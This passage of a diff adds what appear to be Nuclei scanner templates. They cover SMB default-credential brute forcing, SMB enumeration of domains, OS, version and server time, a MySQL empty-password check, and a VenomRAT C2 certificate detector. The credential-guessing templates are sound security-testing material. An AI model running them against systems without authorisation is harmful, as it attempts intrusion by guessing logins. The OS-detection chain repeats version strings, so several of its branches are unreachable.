+++ b/javascript/enumeration/smb/smb-default-creds.yaml
@@ -0,0 +1,46 @@
+id: smb-default-creds
+
+info:
+ name: SMB Default Credential - Brutforcing
+ author: pussycat0x
+ severity: high
+ description: |
+ Attempts to guess username/password combinations over SMB.
+ reference:
+ - https://nmap.org/nsedoc/scripts/smb-brute.html
+ metadata:
+ verified: true
+ shodan-query: "port:445"
+ tags: js,network,smb,enum,default
+
+javascript:
+ - code: |
+ var m = require("nuclei/smb");
+ var c = new m.SMBClient();
+ var response = c.ListShares(Host, Port, User, Pass);
+ response;
+
+ args:
+ Host: "{{Host}}"
+ Port: "445"
+ User: "{{usernames}}"
+ Pass: "{{passwords}}"
+
+ attack: clusterbomb
+ payloads:
+ usernames:
+ - 'admin'
+ - 'administrator'
+ - 'guest'
+ passwords:
+ - 'admin'
+ - 'password'
+ - 'guest'
+
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - 'response != "[]"'
+ - 'success == true'
+ condition: and
diff --git a/javascript/enumeration/smb/smb-enum-domains.yaml b/javascript/enumeration/smb/smb-enum-domains.yaml
new file mode 100644
index 0000000000..39c928c9f5
--- /dev/null
+++ b/javascript/enumeration/smb/smb-enum-domains.yaml
@@ -0,0 +1,41 @@
+id: smb-enum-domains
+
+info:
+ name: SMB - Enum Domains
+ author: DhiyaneshDK
+ severity: info
+ description: |
+ SMB enumeration of domains is often part of the reconnaissance phase, where security professionals or attackers attempt to gather information about the target network to identify potential vulnerabilities.
+ reference:
+ - https://nmap.org/nsedoc/scripts/smb-enum-domains.html
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: port:445
+ tags: js,network,smb,enum
+
+javascript:
+ - code: |
+ var m = require("nuclei/smb");
+ var c = new m.SMBClient();
+ var response = c.ListSMBv2Metadata(Host, Port);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "445"
+ matchers:
+ - type: dsl
+ dsl:
+ - "len(DNSDomainName) != 0"
+
+ extractors:
+ - type: json
+ internal: true
+ name: DNSDomainName
+ json:
+ - '.DNSDomainName'
+
+ - type: json
+ json:
+ - '"DomainName: "+ .DNSDomainName '
diff --git a/javascript/enumeration/smb/smb-os-detect.yaml b/javascript/enumeration/smb/smb-os-detect.yaml
new file mode 100644
index 0000000000..deb6aa604f
--- /dev/null
+++ b/javascript/enumeration/smb/smb-os-detect.yaml
@@ -0,0 +1,158 @@
+id: smb-os-detect
+
+info:
+ name: SMB Operating System - Detect
+ author: pussycat0x
+ severity: info
+ description: |
+ Detect Operating System
+ reference:
+ - https://nmap.org/nsedoc/scripts/smb-os-discovery.html
+ metadata:
+ shodan-query: "port:445"
+ tags: js,network,smb,enum,os
+
+javascript:
+ - code: |
+ var m = require("nuclei/smb");
+ var c = new m.SMBClient();
+ var response = c.ListSMBv2Metadata(Host, Port);
+ if (response.OSVersion === "6.3.9600") {
+ osInfo = "Windows 8.1";
+ } else if (response.OSVersion === "3.10.511") {
+ osInfo = "Windows NT 3.1";
+ } else if (response.OSVersion === "3.50.807") {
+ osInfo = "Windows NT 3.5";
+ } else if (response.OSVersion === "3.10.528") {
+ osInfo = "Windows NT 3.1, Service Pack 3";
+ } else if (response.OSVersion === "3.51.1057") {
+ osInfo = "Windows NT 3.51";
+ } else if (response.OSVersion === "4.00.950") {
+ osInfo = "Windows 95";
+ } else if (response.OSVersion === "4.00.950A") {
+ osInfo = "Windows 95 OEM Service Release 1";
+ } else if (response.OSVersion === "4.00.950B") {
+ osInfo = "Windows 95 OEM Service Release 2";
+ } else if (response.OSVersion === "4.0.1381") {
+ osInfo = "Windows NT 4.0";
+ } else if (response.OSVersion === "4.00.950B") {
+ osInfo = "Windows 95 OEM Service Release 2.1";
+ } else if (response.OSVersion === "4.00.950C") {
+ osInfo = "OEM Service Release 2.5";
+ } else if (response.OSVersion === "4.10.1998") {
+ osInfo = "Windows 98";
+ } else if (response.OSVersion === "4.10.2222") {
+ osInfo = "Windows 98 Second Edition (SE)";
+ } else if (response.OSVersion === "5.0.2195") {
+ osInfo = "Windows 2000";
+ } else if (response.OSVersion === "4.90.3000") {
+ osInfo = "Windows Me";
+ } else if (response.OSVersion === "5.1.2600") {
+ osInfo = "Windows XP";
+ } else if (response.OSVersion === "5.1.2600.1105-1106") {
+ osInfo = "Windows XP, Service Pack 1";
+ } else if (response.OSVersion === "5.2.3790") {
+ osInfo = "Windows Server 2003";
+ } else if (response.OSVersion === "5.1.2600.2180") {
+ osInfo = "Windows XP, Service Pack 2";
+ } else if (response.OSVersion === "5.2.3790.1180") {
+ osInfo = "Windows Server 2003, Service Pack 1";
+ } else if (response.OSVersion === "5.2.3790") {
+ osInfo = "Windows Server 2003 R2";
+ } else if (response.OSVersion === "6.0.6000") {
+ osInfo = "Windows Vista";
+ } else if (response.OSVersion === "5.2.3790") {
+ osInfo = "Windows Server 2003, Service Pack 2";
+ } else if (response.OSVersion === "5.2.4500") {
+ osInfo = "Windows Home Server";
+ } else if (response.OSVersion === "6.0.6001") {
+ osInfo = "Windows Vista, Service Pack 1";
+ } else if (response.OSVersion === "6.0.6001") {
+ osInfo = "Windows Server 2008";
+ } else if (response.OSVersion === "5.1.2600") {
+ osInfo = "Windows XP, Service Pack 3";
+ } else if (response.OSVersion === "6.0.6002") {
+ osInfo = "Windows Vista, Service Pack 2";
+ } else if (response.OSVersion === "6.0.6002") {
+ osInfo = "Windows Server 2008, Service Pack 2";
+ } else if (response.OSVersion === "6.1.7600") {
+ osInfo = "Windows 7";
+ } else if (response.OSVersion === "6.1.7600") {
+ osInfo = "Windows Server 2008 R2";
+ } else if (response.OSVersion === "6.1.7601") {
+ osInfo = "Windows 7, Service Pack 1";
+ } else if (response.OSVersion === "6.1.7601") {
+ osInfo = "Windows Server 2008 R2, Service Pack ";
+ } else if (response.OSVersion === "6.1.8400") {
+ osInfo = "Windows Home Server 2011";
+ } else if (response.OSVersion === "6.2.9200") {
+ osInfo = "Windows Server 2012";
+ } else if (response.OSVersion === "6.2.9200") {
+ osInfo = "Windows 8";
+ } else if (response.OSVersion === "6.3.9600") {
+ osInfo = "Windows 8.1";
+ } else if (response.OSVersion === "6.3.9600") {
+ osInfo = "Windows Server 2012 R2";
+ } else if (response.OSVersion === "10.0.10240") {
+ osInfo = "Windows 10, Version 1507";
+ } else if (response.OSVersion === "10.0.10586") {
+ osInfo = "Windows 10, Version 1511";
+ } else if (response.OSVersion === "10.0.14393") {
+ osInfo = "Windows 10, Version 1607";
+ } else if (response.OSVersion === "10.0.14393") {
+ osInfo = "Windows Server 2016, Version 1607";
+ } else if (response.OSVersion === "10.0.15063") {
+ osInfo = "Windows 10, Version 1703";
+ } else if (response.OSVersion === "10.0.16299") {
+ osInfo = "Windows 10, Version 1709";
+ } else if (response.OSVersion === "10.0.17134") {
+ osInfo = "Windows 10, Version 1803";
+ } else if (response.OSVersion === "10.0.17763") {
+ osInfo = "Windows Server 2019, Version 1809";
+ } else if (response.OSVersion === "10.0.17763") {
+ osInfo = "Windows 10, Version 1809";
+ } else if (response.OSVersion === "6.0.6003") {
+ osInfo = "Windows Server 2008, Service Pack 2, Rollup KB4489887";
+ } else if (response.OSVersion === "10.0.18362") {
+ osInfo = "Windows 10, Version 1903";
+ } else if (response.OSVersion === "10.0.18363") {
+ osInfo = "Windows 10, Version 1909";
+ } else if (response.OSVersion === "10.0.18363") {
+ osInfo = "Windows Server, Version 1909";
+ } else if (response.OSVersion === "10.0.19041") {
+ osInfo = "Windows 10, Version 2004";
+ } else if (response.OSVersion === "10.0.19041") {
+ osInfo = "Windows Server, Version 2004";
+ } else if (response.OSVersion === "10.0.19042") {
+ osInfo = "Windows 10, Version 20H2";
+ } else if (response.OSVersion === "10.0.19042") {
+ osInfo = "Windows Server, Version 20H2";
+ } else if (response.OSVersion === "10.0.19043") {
+ osInfo = "Windows 10, Version 21H1";
+ } else if (response.OSVersion === "10.0.20348") {
+ osInfo = "Windows Server 2022, Version 21H2";
+ } else if (response.OSVersion === "10.0.22000") {
+ osInfo = "Windows 11, Version 21H2";
+ } else if (response.OSVersion === "10.0.19044") {
+ osInfo = "Windows 10, Version 21H2";
+ } else if (response.OSVersion === "10.0.22621") {
+ osInfo = "Windows 11, Version 22H2";
+ } else if (response.OSVersion === "10.0.19045") {
+ osInfo = "Windows 10, Version 22H2";
+ } else if (response.OSVersion === "10.0.25398") {
+ osInfo = "Windows Server, Version 23H2";
+ } else if (response.OSVersion === "10.0.22631") {
+ osInfo = "Windows 11, Version 23H2";
+ } else if (response.OSVersion !== "0") {
+ osInfo = response.OSVersion;
+ }
+ osInfo;
+
+ args:
+ Host: "{{Host}}"
+ Port: "445"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - response
\ No newline at end of file
diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml
new file mode 100644
index 0000000000..6bd0d74f77
--- /dev/null
+++ b/javascript/enumeration/smb/smb-version-detect.yaml
@@ -0,0 +1,33 @@
+id: smb-version-detect
+
+info:
+ name: SMB Version - Detection
+ author: pussycat0x
+ severity: info
+ description: |
+ SMB version detection involves identifying the specific Server Message Block protocol version used by a system or network. This process is crucial for ensuring compatibility and security, as different SMB versions may have distinct features and vulnerabilities.
+ metadata:
+ shodan-query: "port:445"
+ tags: js,network,smb,enum
+
+javascript:
+ - code: |
+ let m = require("nuclei/smb");
+ let c = new m.SMBClient();
+ let response = c.ConnectSMBInfoMode(Host, Port);
+ Export(response);
+
+ args:
+ Host: "{{Host}}"
+ Port: "445"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - "len(smb-version) != 0"
+
+ extractors:
+ - type: json
+ name: smb-version
+ json:
+ - '.Version.VerString'
diff --git a/javascript/enumeration/smb/smb2-server-time.yaml b/javascript/enumeration/smb/smb2-server-time.yaml
new file mode 100644
index 0000000000..3cb9148b8d
--- /dev/null
+++ b/javascript/enumeration/smb/smb2-server-time.yaml
@@ -0,0 +1,38 @@
+id: smb2-server-time
+
+info:
+ name: SMB2 Server Time - Detection
+ author: DhiyaneshDK
+ severity: info
+ description: |
+ Trying to retrieve the present date of the system along with the initiation date of an SMB2 server.
+ reference:
+ - https://nmap.org/nsedoc/scripts/smb2-time.html
+ metadata:
+ shodan-query: "port:445"
+ verified: true
+ tags: js,network,smb,enum
+
+javascript:
+ - code: |
+ var m = require("nuclei/smb");
+ var c = m.SMBClient();
+ var response = c.ConnectSMBInfoMode(Host,Port);
+ var systemTime = new Date(response.NegotiationLog.SystemTime * 1000).toISOString();
+ var serverstartTime = new Date(response.NegotiationLog.ServerStartTime * 1000).toISOString();
+ var result = "SystemTime: " + systemTime + " ServerStartTime: " + serverstartTime;
+ result
+
+ args:
+ Host: "{{Host}}"
+ Port: "445"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - success
+
+ extractors:
+ - type: dsl
+ dsl:
+ - response
diff --git a/javascript/misconfiguration/mysql/mysql-empty-password.yaml b/javascript/misconfiguration/mysql/mysql-empty-password.yaml
new file mode 100644
index 0000000000..7c9973ea90
--- /dev/null
+++ b/javascript/misconfiguration/mysql/mysql-empty-password.yaml
@@ -0,0 +1,41 @@
+id: mysql-empty-password
+
+info:
+ name: MySQL - Empty Password
+ author: DhiyaneshDk
+ severity: high
+ description: |
+ Checks for MySQL servers with an empty password for root or anonymous.
+ metadata:
+ shodan-query: port:3306
+ tags: js,mssql,network
+
+javascript:
+ - pre-condition: |
+ var m = require("nuclei/mysql");
+ var c = m.MySQLClient();
+ c.IsMySQL(Host, Port);
+
+ code: |
+ var m = require("nuclei/mysql");
+ var c = m.MySQLClient();
+ c.Connect(Host,Port,User,Pass)
+
+ args:
+ Host: "{{Host}}"
+ Port: "3306"
+ User: "{{username}}"
+ Pass: " "
+
+ payloads:
+ usernames:
+ - root
+ - anonymous
+
+ stop-at-first-match: true
+ matchers:
+ - type: dsl
+ dsl:
+ - "response == true"
+ - "success == true"
+ condition: and
diff --git a/ssl/c2/venomrat.yaml b/ssl/c2/venomrat.yaml
new file mode 100644
index 0000000000..cb8bfbcf42
--- /dev/null
+++ b/ssl/c2/venomrat.yaml
@@ -0,0 +1,26 @@
+id: venomrat
+
+info:
+ name: VenomRAT - Detect
+ author: pussycat0x
+ severity: info
+ reference:
+ - https://twitter.com/v0lundr_/status/1727277517659353297
+ metadata:
+ verified: "true"
+ max-request: 1
+ fofa-query: cert.issuer.cn="VenomRAT Server"
+ tags: c2,ir,osint,malware,ssl,venomrat
+
+ssl:
+ - address: "{{Host}}:{{Port}}"
+ matchers:
+ - type: word
+ part: issuer_cn
+ words:
+ - "VenomRAT Server"
+
+ extractors:
+ - type: json
+ json:
+ - ".issuer_cn"